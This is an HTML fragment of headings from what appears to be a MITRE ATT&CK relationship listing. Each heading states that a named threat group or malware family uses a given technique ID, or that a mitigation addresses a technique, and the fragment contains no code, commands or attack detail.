<h3 id="_hcdloader_s0071_uses_command_line_interface_t1059"><a class="anchor" href="#_hcdloader_s0071_uses_command_line_interface_t1059"></a><a class="link" href="#_hcdloader_s0071_uses_command_line_interface_t1059">hcdLoader (S0071) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_file_system_logical_offsets_mitigation_t1006_mitigates_file_system_logical_offsets_t1006"><a class="anchor" href="#_file_system_logical_offsets_mitigation_t1006_mitigates_file_system_logical_offsets_t1006"></a><a class="link" href="#_file_system_logical_offsets_mitigation_t1006_mitigates_file_system_logical_offsets_t1006">File System Logical Offsets Mitigation (T1006) mitigates File System Logical Offsets (T1006)</a></h3>
</div>
<div class="sect2">
<h3 id="_data_from_network_shared_drive_mitigation_t1039_mitigates_data_from_network_shared_drive_t1039"><a class="anchor" href="#_data_from_network_shared_drive_mitigation_t1039_mitigates_data_from_network_shared_drive_t1039"></a><a class="link" href="#_data_from_network_shared_drive_mitigation_t1039_mitigates_data_from_network_shared_drive_t1039">Data from Network Shared Drive Mitigation (T1039) mitigates Data from Network Shared Drive (T1039)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_command_line_interface_t1059"><a class="anchor" href="#_threat_group_3390_g0027_uses_command_line_interface_t1059"></a><a class="link" href="#_threat_group_3390_g0027_uses_command_line_interface_t1059">Threat Group-3390 (G0027) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_custom_command_and_control_protocol_t1094"><a class="anchor" href="#_duqu_s0038_uses_custom_command_and_control_protocol_t1094"></a><a class="link" href="#_duqu_s0038_uses_custom_command_and_control_protocol_t1094">Duqu (S0038) uses Custom Command and Control Protocol (T1094)</a></h3>
</div>
<div class="sect2">
<h3 id="_seaduke_s0053_uses_remote_file_copy_t1105"><a class="anchor" href="#_seaduke_s0053_uses_remote_file_copy_t1105"></a><a class="link" href="#_seaduke_s0053_uses_remote_file_copy_t1105">SeaDuke (S0053) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_webc2_s0109_uses_dll_search_order_hijacking_t1038"><a class="anchor" href="#_webc2_s0109_uses_dll_search_order_hijacking_t1038"></a><a class="link" href="#_webc2_s0109_uses_dll_search_order_hijacking_t1038">WEBC2 (S0109) uses DLL Search Order Hijacking (T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_replication_through_removable_media_t1091"><a class="anchor" href="#_chopstick_s0023_uses_replication_through_removable_media_t1091"></a><a class="link" href="#_chopstick_s0023_uses_replication_through_removable_media_t1091">CHOPSTICK (S0023) uses Replication Through Removable Media (T1091)</a></h3>
</div>
<div class="sect2">
<h3 id="_dust_storm_g0031_uses_zlib_s0086"><a class="anchor" href="#_dust_storm_g0031_uses_zlib_s0086"></a><a class="link" href="#_dust_storm_g0031_uses_zlib_s0086">Dust Storm (G0031) uses ZLib (S0086)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_reaver_s0172_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_reaver_s0172_uses_standard_non_application_layer_protocol_t1095">Reaver (S0172) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_remote_system_discovery_mitigation_t1018_mitigates_remote_system_discovery_t1018"><a class="anchor" href="#_remote_system_discovery_mitigation_t1018_mitigates_remote_system_discovery_t1018"></a><a class="link" href="#_remote_system_discovery_mitigation_t1018_mitigates_remote_system_discovery_t1018">Remote System Discovery Mitigation (T1018) mitigates Remote System Discovery (T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_query_registry_t1012"><a class="anchor" href="#_backspace_s0031_uses_query_registry_t1012"></a><a class="link" href="#_backspace_s0031_uses_query_registry_t1012">BACKSPACE (S0031) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_neteagle_s0034_uses_exfiltration_over_command_and_control_channel_t1041"><a class="anchor" href="#_neteagle_s0034_uses_exfiltration_over_command_and_control_channel_t1041"></a><a class="link" href="#_neteagle_s0034_uses_exfiltration_over_command_and_control_channel_t1041">NETEAGLE (S0034) uses Exfiltration Over Command and Control Channel (T1041)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_exploitation_of_vulnerability_t1068"><a class="anchor" href="#_threat_group_3390_g0027_uses_exploitation_of_vulnerability_t1068"></a><a class="link" href="#_threat_group_3390_g0027_uses_exploitation_of_vulnerability_t1068">Threat Group-3390 (G0027) uses Exploitation of Vulnerability (T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_misdat_s0083_uses_indicator_removal_on_host_t1070"><a class="anchor" href="#_misdat_s0083_uses_indicator_removal_on_host_t1070"></a><a class="link" href="#_misdat_s0083_uses_indicator_removal_on_host_t1070">Misdat (S0083) uses Indicator Removal on Host (T1070)</a></h3>
</div>
<div class="sect2">
<h3 id="_zeroaccess_s0027_uses_rootkit_t1014"><a class="anchor" href="#_zeroaccess_s0027_uses_rootkit_t1014"></a><a class="link" href="#_zeroaccess_s0027_uses_rootkit_t1014">Zeroaccess (S0027) uses Rootkit (T1014)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_pisloader_s0124_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_pisloader_s0124_uses_registry_run_keys_start_folder_t1060">Pisloader (S0124) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_putter_panda_g0024_uses_disabling_security_tools_t1089"><a class="anchor" href="#_putter_panda_g0024_uses_disabling_security_tools_t1089"></a><a class="link" href="#_putter_panda_g0024_uses_disabling_security_tools_t1089">Putter Panda (G0024) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_file_deletion_t1107"><a class="anchor" href="#_apt34_g0057_uses_file_deletion_t1107"></a><a class="link" href="#_apt34_g0057_uses_file_deletion_t1107">APT34 (G0057) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_winnti_group_g0044_uses_winnti_s0141"><a class="anchor" href="#_winnti_group_g0044_uses_winnti_s0141"></a><a class="link" href="#_winnti_group_g0044_uses_winnti_s0141">Winnti Group (G0044) uses Winnti (S0141)</a></h3>
</div>
<div class="sect2">
<h3 id="_komplex_s0162_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_komplex_s0162_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_komplex_s0162_uses_custom_cryptographic_protocol_t1024">Komplex (S0162) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt32_g0050_uses_timestomp_t1099"><a class="anchor" href="#_apt32_g0050_uses_timestomp_t1099"></a><a class="link" href="#_apt32_g0050_uses_timestomp_t1099">APT32 (G0050) uses Timestomp (T1099)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_system_service_discovery_t1007"><a class="anchor" href="#_admin_338_g0018_uses_system_service_discovery_t1007"></a><a class="link" href="#_admin_338_g0018_uses_system_service_discovery_t1007">admin@338 (G0018) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_owaauth_s0072_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_owaauth_s0072_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_owaauth_s0072_uses_file_and_directory_discovery_t1083">OwaAuth (S0072) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_spaceship_s0035_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_spaceship_s0035_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_spaceship_s0035_uses_file_and_directory_discovery_t1083">SPACESHIP (S0035) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_ssh_hijacking_mitigation_t1184_mitigates_ssh_hijacking_t1184"><a class="anchor" href="#_ssh_hijacking_mitigation_t1184_mitigates_ssh_hijacking_t1184"></a><a class="link" href="#_ssh_hijacking_mitigation_t1184_mitigates_ssh_hijacking_t1184">SSH Hijacking Mitigation (T1184) mitigates SSH Hijacking (T1184)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_multilayer_encryption_t1079"><a class="anchor" href="#_hi_zor_s0087_uses_multilayer_encryption_t1079"></a><a class="link" href="#_hi_zor_s0087_uses_multilayer_encryption_t1079">Hi-Zor (S0087) uses Multilayer Encryption (T1079)</a></h3>
</div>
<div class="sect2">
<h3 id="_psylo_s0078_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_psylo_s0078_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_psylo_s0078_uses_standard_application_layer_protocol_t1071">Psylo (S0078) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_rundll32_t1085"><a class="anchor" href="#_coreshell_s0137_uses_rundll32_t1085"></a><a class="link" href="#_coreshell_s0137_uses_rundll32_t1085">CORESHELL (S0137) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_web_service_t1102"><a class="anchor" href="#_magic_hound_g0059_uses_web_service_t1102"></a><a class="link" href="#_magic_hound_g0059_uses_web_service_t1102">Magic Hound (G0059) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_powershell_t1086"><a class="anchor" href="#_apt3_g0022_uses_powershell_t1086"></a><a class="link" href="#_apt3_g0022_uses_powershell_t1086">APT3 (G0022) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_query_registry_t1012"><a class="anchor" href="#_chopstick_s0023_uses_query_registry_t1012"></a><a class="link" href="#_chopstick_s0023_uses_query_registry_t1012">CHOPSTICK (S0023) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_sykipot_s0018_uses_system_service_discovery_t1007"><a class="anchor" href="#_sykipot_s0018_uses_system_service_discovery_t1007"></a><a class="link" href="#_sykipot_s0018_uses_system_service_discovery_t1007">Sykipot (S0018) uses System Service Discovery (T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_prikormka_s0113_uses_dll_search_order_hijacking_t1038"><a class="anchor" href="#_prikormka_s0113_uses_dll_search_order_hijacking_t1038"></a><a class="link" href="#_prikormka_s0113_uses_dll_search_order_hijacking_t1038">Prikormka (S0113) uses DLL Search Order Hijacking (T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_cmd_s0106"><a class="anchor" href="#_apt18_g0026_uses_cmd_s0106"></a><a class="link" href="#_apt18_g0026_uses_cmd_s0106">APT18 (G0026) uses cmd (S0106)</a></h3>
</div>
<div class="sect2">
<h3 id="_cobalt_strike_s0154_uses_bypass_user_account_control_t1088"><a class="anchor" href="#_cobalt_strike_s0154_uses_bypass_user_account_control_t1088"></a><a class="link" href="#_cobalt_strike_s0154_uses_bypass_user_account_control_t1088">Cobalt Strike (S0154) uses Bypass User Account Control (T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_magic_hound_g0059_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_magic_hound_g0059_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_magic_hound_g0059_uses_system_network_configuration_discovery_t1016">Magic Hound (G0059) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_oilrig_g0049_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_oilrig_g0049_uses_system_owner_user_discovery_t1033">OilRig (G0049) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_system_information_discovery_t1082"><a class="anchor" href="#_admin_338_g0018_uses_system_information_discovery_t1082"></a><a class="link" href="#_admin_338_g0018_uses_system_information_discovery_t1082">admin@338 (G0018) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_autoit_backdoor_s0129_uses_powershell_t1086"><a class="anchor" href="#_autoit_backdoor_s0129_uses_powershell_t1086"></a><a class="link" href="#_autoit_backdoor_s0129_uses_powershell_t1086">AutoIt backdoor (S0129) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_group5_g0043_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_group5_g0043_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_group5_g0043_uses_obfuscated_files_or_information_t1027">Group5 (G0043) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_coreshell_s0137_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_coreshell_s0137_uses_standard_application_layer_protocol_t1071">CORESHELL (S0137) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_coreshell_s0137_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_coreshell_s0137_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_coreshell_s0137_uses_registry_run_keys_start_folder_t1060">CORESHELL (S0137) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_rtm_s0148_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_rtm_s0148_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_rtm_s0148_uses_registry_run_keys_start_folder_t1060">RTM (S0148) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_multi_stage_channels_t1104"><a class="anchor" href="#_apt3_g0022_uses_multi_stage_channels_t1104"></a><a class="link" href="#_apt3_g0022_uses_multi_stage_channels_t1104">APT3 (G0022) uses Multi-Stage Channels (T1104)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_hi_zor_s0087_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_hi_zor_s0087_uses_obfuscated_files_or_information_t1027">Hi-Zor (S0087) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124_uses_command_line_interface_t1059"><a class="anchor" href="#_pisloader_s0124_uses_command_line_interface_t1059"></a><a class="link" href="#_pisloader_s0124_uses_command_line_interface_t1059">Pisloader (S0124) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_backspace_s0031_uses_disabling_security_tools_t1089"><a class="anchor" href="#_backspace_s0031_uses_disabling_security_tools_t1089"></a><a class="link" href="#_backspace_s0031_uses_disabling_security_tools_t1089">BACKSPACE (S0031) uses Disabling Security Tools (T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_data_compressed_t1002"><a class="anchor" href="#_fin6_g0037_uses_data_compressed_t1002"></a><a class="link" href="#_fin6_g0037_uses_data_compressed_t1002">FIN6 (G0037) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_external_remote_services_t1133"><a class="anchor" href="#_dragonfly_g0035_uses_external_remote_services_t1133"></a><a class="link" href="#_dragonfly_g0035_uses_external_remote_services_t1133">Dragonfly (G0035) uses External Remote Services (T1133)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt18_g0026_uses_external_remote_services_t1133"><a class="anchor" href="#_apt18_g0026_uses_external_remote_services_t1133"></a><a class="link" href="#_apt18_g0026_uses_external_remote_services_t1133">APT18 (G0026) uses External Remote Services (T1133)</a></h3>
</div>
<div class="sect2">
<h3 id="_daserf_s0187_uses_data_encoding_t1132"><a class="anchor" href="#_daserf_s0187_uses_data_encoding_t1132"></a><a class="link" href="#_daserf_s0187_uses_data_encoding_t1132">Daserf (S0187) uses Data Encoding (T1132)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_windows_credential_editor_s0005"><a class="anchor" href="#_threat_group_3390_g0027_uses_windows_credential_editor_s0005"></a><a class="link" href="#_threat_group_3390_g0027_uses_windows_credential_editor_s0005">Threat Group-3390 (G0027) uses Windows Credential Editor (S0005)</a></h3>
</div>
<div class="sect2">
<h3 id="_molerats_g0021_uses_credential_dumping_t1003"><a class="anchor" href="#_molerats_g0021_uses_credential_dumping_t1003"></a><a class="link" href="#_molerats_g0021_uses_credential_dumping_t1003">Molerats (G0021) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_clipboard_data_t1115"><a class="anchor" href="#_cosmicduke_s0050_uses_clipboard_data_t1115"></a><a class="link" href="#_cosmicduke_s0050_uses_clipboard_data_t1115">CosmicDuke (S0050) uses Clipboard Data (T1115)</a></h3>
</div>
<div class="sect2">
<h3 id="_nbtstat_s0102_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_nbtstat_s0102_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_nbtstat_s0102_uses_system_network_connections_discovery_t1049">nbtstat (S0102) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_backdoor_oldrea_s0093"><a class="anchor" href="#_dragonfly_g0035_uses_backdoor_oldrea_s0093"></a><a class="link" href="#_dragonfly_g0035_uses_backdoor_oldrea_s0093">Dragonfly (G0035) uses Backdoor.Oldrea (S0093)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_scheduled_task_t1053"><a class="anchor" href="#_stealth_falcon_g0038_uses_scheduled_task_t1053"></a><a class="link" href="#_stealth_falcon_g0038_uses_scheduled_task_t1053">Stealth Falcon (G0038) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_duqu_s0038_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_duqu_s0038_uses_standard_application_layer_protocol_t1071">Duqu (S0038) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_gsecdump_s0008"><a class="anchor" href="#_threat_group_3390_g0027_uses_gsecdump_s0008"></a><a class="link" href="#_threat_group_3390_g0027_uses_gsecdump_s0008">Threat Group-3390 (G0027) uses gsecdump (S0008)</a></h3>
</div>
<div class="sect2">
<h3 id="_mivast_s0080_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_mivast_s0080_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_mivast_s0080_uses_registry_run_keys_start_folder_t1060">Mivast (S0080) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_poseidon_group_g0033_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_poseidon_group_g0033_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_poseidon_group_g0033_uses_system_network_connections_discovery_t1049">Poseidon Group (G0033) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_security_software_discovery_t1063"><a class="anchor" href="#_felismus_s0171_uses_security_software_discovery_t1063"></a><a class="link" href="#_felismus_s0171_uses_security_software_discovery_t1063">Felismus (S0171) uses Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt30_g0013_uses_neteagle_s0034"><a class="anchor" href="#_apt30_g0013_uses_neteagle_s0034"></a><a class="link" href="#_apt30_g0013_uses_neteagle_s0034">APT30 (G0013) uses NETEAGLE (S0034)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_file_deletion_t1107"><a class="anchor" href="#_sakula_s0074_uses_file_deletion_t1107"></a><a class="link" href="#_sakula_s0074_uses_file_deletion_t1107">Sakula (S0074) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_mshta_t1170"><a class="anchor" href="#_fin7_g0046_uses_mshta_t1170"></a><a class="link" href="#_fin7_g0046_uses_mshta_t1170">FIN7 (G0046) uses Mshta (T1170)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_pteranodon_s0147"><a class="anchor" href="#_gamaredon_group_g0047_uses_pteranodon_s0147"></a><a class="link" href="#_gamaredon_group_g0047_uses_pteranodon_s0147">Gamaredon Group (G0047) uses Pteranodon (S0147)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_file_deletion_t1107"><a class="anchor" href="#_lazarus_group_g0032_uses_file_deletion_t1107"></a><a class="link" href="#_lazarus_group_g0032_uses_file_deletion_t1107">Lazarus Group (G0032) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_4h_rat_s0065_uses_process_discovery_t1057"><a class="anchor" href="#_4h_rat_s0065_uses_process_discovery_t1057"></a><a class="link" href="#_4h_rat_s0065_uses_process_discovery_t1057">4H RAT (S0065) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_software_packing_t1045"><a class="anchor" href="#_patchwork_g0040_uses_software_packing_t1045"></a><a class="link" href="#_patchwork_g0040_uses_software_packing_t1045">Patchwork (G0040) uses Software Packing (T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_autoit_backdoor_s0129_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_autoit_backdoor_s0129_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_autoit_backdoor_s0129_uses_file_and_directory_discovery_t1083">AutoIt backdoor (S0129) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_s0039_uses_network_share_connection_removal_t1126"><a class="anchor" href="#_net_s0039_uses_network_share_connection_removal_t1126"></a><a class="link" href="#_net_s0039_uses_network_share_connection_removal_t1126">Net (S0039) uses Network Share Connection Removal (T1126)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_process_injection_t1055"><a class="anchor" href="#_blackenergy_s0089_uses_process_injection_t1055"></a><a class="link" href="#_blackenergy_s0089_uses_process_injection_t1055">BlackEnergy (S0089) uses Process Injection (T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpclient_s0068_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_httpclient_s0068_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_httpclient_s0068_uses_standard_application_layer_protocol_t1071">httpclient (S0068) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_shared_webroot_mitigation_t1051_mitigates_shared_webroot_t1051"><a class="anchor" href="#_shared_webroot_mitigation_t1051_mitigates_shared_webroot_t1051"></a><a class="link" href="#_shared_webroot_mitigation_t1051_mitigates_shared_webroot_t1051">Shared Webroot Mitigation (T1051) mitigates Shared Webroot (T1051)</a></h3>
</div>
<div class="sect2">
<h3 id="_windshield_s0155_uses_system_information_discovery_t1082"><a class="anchor" href="#_windshield_s0155_uses_system_information_discovery_t1082"></a><a class="link" href="#_windshield_s0155_uses_system_information_discovery_t1082">WINDSHIELD (S0155) uses System Information Discovery (T1082)</a></h3>
</div>
<div class="sect2">
<h3 id="_security_software_discovery_mitigation_t1063_mitigates_security_software_discovery_t1063"><a class="anchor" href="#_security_software_discovery_mitigation_t1063_mitigates_security_software_discovery_t1063"></a><a class="link" href="#_security_software_discovery_mitigation_t1063_mitigates_security_software_discovery_t1063">Security Software Discovery Mitigation (T1063) mitigates Security Software Discovery (T1063)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_rundll32_t1085"><a class="anchor" href="#_powerduke_s0139_uses_rundll32_t1085"></a><a class="link" href="#_powerduke_s0139_uses_rundll32_t1085">PowerDuke (S0139) uses Rundll32 (T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt34_g0057_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_apt34_g0057_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_apt34_g0057_uses_windows_management_instrumentation_t1047">APT34 (G0057) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_lazarus_group_g0032_uses_fallchill_s0181"><a class="anchor" href="#_lazarus_group_g0032_uses_fallchill_s0181"></a><a class="link" href="#_lazarus_group_g0032_uses_fallchill_s0181">Lazarus Group (G0032) uses FALLCHILL (S0181)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_query_registry_t1012"><a class="anchor" href="#_plugx_s0013_uses_query_registry_t1012"></a><a class="link" href="#_plugx_s0013_uses_query_registry_t1012">PlugX (S0013) uses Query Registry (T1012)</a></h3>
</div>
<div class="sect2">
<h3 id="_crimson_s0115_uses_standard_non_application_layer_protocol_t1095"><a class="anchor" href="#_crimson_s0115_uses_standard_non_application_layer_protocol_t1095"></a><a class="link" href="#_crimson_s0115_uses_standard_non_application_layer_protocol_t1095">Crimson (S0115) uses Standard Non-Application Layer Protocol (T1095)</a></h3>
</div>
<div class="sect2">
<h3 id="_net_crawler_s0056_uses_windows_admin_shares_t1077"><a class="anchor" href="#_net_crawler_s0056_uses_windows_admin_shares_t1077"></a><a class="link" href="#_net_crawler_s0056_uses_windows_admin_shares_t1077">Net Crawler (S0056) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_komplex_s0162_uses_hidden_files_and_directories_t1158"><a class="anchor" href="#_komplex_s0162_uses_hidden_files_and_directories_t1158"></a><a class="link" href="#_komplex_s0162_uses_hidden_files_and_directories_t1158">Komplex (S0162) uses Hidden Files and Directories (T1158)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_powershell_t1086"><a class="anchor" href="#_stealth_falcon_g0038_uses_powershell_t1086"></a><a class="link" href="#_stealth_falcon_g0038_uses_powershell_t1086">Stealth Falcon (G0038) uses PowerShell (T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_comrat_s0126_uses_component_object_model_hijacking_t1122"><a class="anchor" href="#_comrat_s0126_uses_component_object_model_hijacking_t1122"></a><a class="link" href="#_comrat_s0126_uses_component_object_model_hijacking_t1122">ComRAT (S0126) uses Component Object Model Hijacking (T1122)</a></h3>
</div>
<div class="sect2">
<h3 id="_brute_force_mitigation_t1110_mitigates_brute_force_t1110"><a class="anchor" href="#_brute_force_mitigation_t1110_mitigates_brute_force_t1110"></a><a class="link" href="#_brute_force_mitigation_t1110_mitigates_brute_force_t1110">Brute Force Mitigation (T1110) mitigates Brute Force (T1110)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_dll_side_loading_t1073"><a class="anchor" href="#_t9000_s0098_uses_dll_side_loading_t1073"></a><a class="link" href="#_t9000_s0098_uses_dll_side_loading_t1073">T9000 (S0098) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_data_encrypted_t1022"><a class="anchor" href="#_t9000_s0098_uses_data_encrypted_t1022"></a><a class="link" href="#_t9000_s0098_uses_data_encrypted_t1022">T9000 (S0098) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_office_application_startup_t1137"><a class="anchor" href="#_apt28_g0007_uses_office_application_startup_t1137"></a><a class="link" href="#_apt28_g0007_uses_office_application_startup_t1137">APT28 (G0007) uses Office Application Startup (T1137)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_uncommonly_used_port_t1065"><a class="anchor" href="#_remsec_s0125_uses_uncommonly_used_port_t1065"></a><a class="link" href="#_remsec_s0125_uses_uncommonly_used_port_t1065">Remsec (S0125) uses Uncommonly Used Port (T1065)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_deobfuscate_decode_files_or_information_t1140"><a class="anchor" href="#_oilrig_g0049_uses_deobfuscate_decode_files_or_information_t1140"></a><a class="link" href="#_oilrig_g0049_uses_deobfuscate_decode_files_or_information_t1140">OilRig (G0049) uses Deobfuscate/Decode Files or Information (T1140)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_netstat_s0104"><a class="anchor" href="#_admin_338_g0018_uses_netstat_s0104"></a><a class="link" href="#_admin_338_g0018_uses_netstat_s0104">admin@338 (G0018) uses netstat (S0104)</a></h3>
</div>
<div class="sect2">
<h3 id="_unknown_logger_s0130_uses_credential_dumping_t1003"><a class="anchor" href="#_unknown_logger_s0130_uses_credential_dumping_t1003"></a><a class="link" href="#_unknown_logger_s0130_uses_credential_dumping_t1003">Unknown Logger (S0130) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_cachedump_s0119_uses_credential_dumping_t1003"><a class="anchor" href="#_cachedump_s0119_uses_credential_dumping_t1003"></a><a class="link" href="#_cachedump_s0119_uses_credential_dumping_t1003">Cachedump (S0119) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_oldbait_s0138_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_oldbait_s0138_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_oldbait_s0138_uses_standard_application_layer_protocol_t1071">OLDBAIT (S0138) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_launch_agent_mitigation_t1159_mitigates_launch_agent_t1159"><a class="anchor" href="#_launch_agent_mitigation_t1159_mitigates_launch_agent_t1159"></a><a class="link" href="#_launch_agent_mitigation_t1159_mitigates_launch_agent_t1159">Launch Agent Mitigation (T1159) mitigates Launch Agent (T1159)</a></h3>
</div>
